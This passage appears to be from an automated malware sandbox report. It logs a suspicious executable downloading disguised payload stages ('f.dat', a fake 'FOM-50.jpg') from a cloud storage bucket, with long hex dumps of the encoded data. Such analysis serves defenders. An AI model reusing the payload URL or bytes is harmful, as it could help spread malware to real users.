2025-01-07 03:22:31 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-07 03:22:31 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-07 03:22:31 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49858	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:35 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:35 UTC	559	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:35 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 677C9DFB3D53853232F1843D Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 18
2025-01-07 03:22:35 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49872	118.178.60.9	443	7296	C:\Users\user\Documents\lOXFJk.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 03:22:36 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-07 03:22:37 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 07 Jan 2025 03:22:37 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 677C9DFD3849223636B649E6 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 8
2025-01-07 03:22:37 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-07 03:22:37 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 